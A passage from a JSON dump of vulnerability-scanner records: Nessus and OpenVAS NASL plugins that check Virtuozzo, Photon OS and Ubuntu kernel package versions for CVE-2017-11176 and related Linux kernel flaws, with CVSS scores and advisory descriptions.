\"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.18.2.vz7.15.2\",\n \"patch\",\"readykernel-patch-15.2-26.1-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.36.1.vz7.18.7\",\n \"patch\",\"readykernel-patch-18.7-26.1-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.36.1.vz7.20.18\",\n \"patch\",\"readykernel-patch-20.18-26.1-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.16.1.vz7.30.10\",\n \"patch\",\"readykernel-patch-30.10-26.1-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.16.1.vz7.30.15\",\n \"patch\",\"readykernel-patch-30.15-26.1-1.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T01:08:47", "description": "An update of the linux package has been released.", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Linux PHSA-2017-0025", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176", "CVE-2017-10989"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0025_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/121716", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0025. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121716);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2017-11176\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2017-0025\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-55.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10989\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-debuginfo-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-dev-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-docs-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-drivers-gpu-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-debuginfo-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-devel-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-docs-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-oprofile-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-sound-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-tools-4.4.77-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176", "CVE-2017-1000252", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-11-01T00:00:00", "id": "OPENVAS:1361412562310843352", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843352", "type": "openvas", "title": "Ubuntu Update for linux-hwe USN-3468-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3468_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-hwe USN-3468-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843352\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-01 05:01:44 +0100 (Wed, 01 Nov 2017)\");\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-10663\", \"CVE-2017-10911\",\n \"CVE-2017-11176\", \"CVE-2017-14340\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-hwe USN-3468-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-hwe'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3468-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 17.04. This update provides the corresponding updates\n for the Linux Hardware Enablement (HWE) kernel from Ubuntu 17.04 for Ubuntu\n 16.04 LTS. It was discovered that the KVM subsystem in the Linux kernel did not\n properly bound guest IRQs. A local attacker in a guest VM could use this to\n cause a denial of service (host system crash). (CVE-2017-1000252) It was\n discovered that the Flash-Friendly File System (f2fs) implementation in the\n Linux kernel did not properly validate superblock metadata. A local attacker\n could use this to cause a denial of service (system crash) or possibly execute\n arbitrary code. (CVE-2017-10663) Anthony Perard discovered that the Xen virtual\n block driver did not properly initialize some data structures before passing\n them to user space. A local attacker in a guest VM could use this to expose\n sensitive information from the host OS or other guest VMs. (CVE-2017-10911) It\n was discovered that a use-after-free vulnerability existed in the POSIX message\n queue implementation in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2017-11176) Dave Chinner discovered that the XFS filesystem did not enforce\n that the realtime inode flag was settable only on filesystems on a realtime\n device. A local attacker could use this to cause a denial of service (system\n crash). (CVE-2017-14340)\");\n script_tag(name:\"affected\", value:\"linux-hwe on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3468-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3468-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-38-generic\", ver:\"4.10.0-38.42~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-38-generic-lpae\", ver:\"4.10.0-38.42~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-38-lowlatency\", ver:\"4.10.0-38.42~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-hwe-16.04\", ver:\"4.10.0.38.40\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-16.04\", ver:\"4.10.0.38.40\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-16.04\", ver:\"4.10.0.38.40\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176", "CVE-2017-1000252", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-11-01T00:00:00", "id": "OPENVAS:1361412562310843356", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843356", "type": "openvas", "title": "Ubuntu Update for linux-gcp USN-3468-3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3468_3.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-gcp USN-3468-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843356\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-01 05:03:27 +0100 (Wed, 01 Nov 2017)\");\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-10663\", \"CVE-2017-10911\",\n \"CVE-2017-11176\", \"CVE-2017-14340\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-gcp USN-3468-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-gcp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the KVM subsystem in\n the Linux kernel did not properly bound guest IRQs. A local attacker in a guest\n VM could use this to cause a denial of service (host system crash).\n (CVE-2017-1000252) It was discovered that the Flash-Friendly File System (f2fs)\n implementation in the Linux kernel did not properly validate superblock\n metadata. A local attacker could use this to cause a denial of service (system\n crash) or possibly execute arbitrary code. (CVE-2017-10663) Anthony Perard\n discovered that the Xen virtual block driver did not properly initialize some\n data structures before passing them to user space. A local attacker in a guest\n VM could use this to expose sensitive information from the host OS or other\n guest VMs. (CVE-2017-10911) It was discovered that a use-after-free\n vulnerability existed in the POSIX message queue implementation in the Linux\n kernel. A local attacker could use this to cause a denial of service (system\n crash) or possibly execute arbitrary code. (CVE-2017-11176) Dave Chinner\n discovered that the XFS filesystem did not enforce that the realtime inode flag\n was settable only on filesystems on a realtime device. A local attacker could\n use this to cause a denial of service (system crash). (CVE-2017-14340)\");\n script_tag(name:\"affected\", value:\"linux-gcp on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3468-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3468-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-1008-gcp\", ver:\"4.10.0-1008.8\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.10.0.1008.10\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176", "CVE-2017-1000252", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-11-01T00:00:00", "id": "OPENVAS:1361412562310843353", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843353", "type": "openvas", "title": "Ubuntu Update for linux USN-3468-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3468_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3468-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843353\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-01 05:02:17 +0100 (Wed, 01 Nov 2017)\");\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-10663\", \"CVE-2017-10911\",\n \"CVE-2017-11176\", \"CVE-2017-14340\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3468-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the KVM subsystem in\n the Linux kernel did not properly bound guest IRQs. A local attacker in a guest\n VM could use this to cause a denial of service (host system crash).\n (CVE-2017-1000252) It was discovered that the Flash-Friendly File System (f2fs)\n implementation in the Linux kernel did not properly validate superblock\n metadata. A local attacker could use this to cause a denial of service (system\n crash) or possibly execute arbitrary code. (CVE-2017-10663) Anthony Perard\n discovered that the Xen virtual block driver did not properly initialize some\n data structures before passing them to user space. A local attacker in a guest\n VM could use this to expose sensitive information from the host OS or other\n guest VMs. (CVE-2017-10911) It was discovered that a use-after-free\n vulnerability existed in the POSIX message queue implementation in the Linux\n kernel. A local attacker could use this to cause a denial of service (system\n crash) or possibly execute arbitrary code. (CVE-2017-11176) Dave Chinner\n discovered that the XFS filesystem did not enforce that the realtime inode flag\n was settable only on filesystems on a realtime device. A local attacker could\n use this to cause a denial of service (system crash). (CVE-2017-14340)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 17.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3468-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3468-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU17\\.04\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-1020-raspi2\", ver:\"4.10.0-1020.23\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-38-generic\", ver:\"4.10.0-38.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-38-generic-lpae\", ver:\"4.10.0-38.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-38-lowlatency\", ver:\"4.10.0-38.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.10.0.38.38\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.10.0.38.38\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.10.0.38.38\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.10.0.1020.21\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176", "CVE-2016-8632", "CVE-2017-10661", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663", "CVE-2017-10662"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-11-01T00:00:00", "id": "OPENVAS:1361412562310843357", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843357", "type": "openvas", "title": "Ubuntu Update for linux USN-3470-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3470_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3470-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843357\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-01 05:04:00 +0100 (Wed, 01 Nov 2017)\");\n script_cve_id(\"CVE-2016-8632\", \"CVE-2017-10661\", \"CVE-2017-10662\", \"CVE-2017-10663\",\n \"CVE-2017-10911\", \"CVE-2017-11176\", \"CVE-2017-14340\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3470-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Qian Zhang discovered a heap-based buffer\n overflow in the tipc_msg_build() function in the Linux kernel. A local attacker\n could use to cause a denial of service (system crash) or possibly execute\n arbitrary code with administrative privileges. (CVE-2016-8632) Dmitry Vyukov\n discovered that a race condition existed in the timerfd subsystem of the Linux\n kernel when handling might_cancel queuing. A local attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2017-10661) It was discovered that the Flash-Friendly File System (f2fs)\n implementation in the Linux kernel did not properly validate superblock\n metadata. A local attacker could use this to cause a denial of service (system\n crash) or possibly execute arbitrary code. (CVE-2017-10662, CVE-2017-10663)\n Anthony Perard discovered that the Xen virtual block driver did not properly\n initialize some data structures before passing them to user space. A local\n attacker in a guest VM could use this to expose sensitive information from the\n host OS or other guest VMs. (CVE-2017-10911) It was discovered that a\n use-after-free vulnerability existed in the POSIX message queue implementation\n in the Linux kernel. A local attacker could use this to cause a denial of\n service (system crash) or possibly execute arbitrary code. (CVE-2017-11176) Dave\n Chinner discovered that the XFS filesystem did not enforce that the realtime\n inode flag was settable only on filesystems on a realtime device. A local\n attacker could use this to cause a denial of service (system crash).\n (CVE-2017-14340)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3470-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3470-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-135-generic\", ver:\"3.13.0-135.184\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-135-generic-lpae\", ver:\"3.13.0-135.184\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-135-lowlatency\", ver:\"3.13.0-135.184\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-135-powerpc-e500\", ver:\"3.13.0-135.184\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 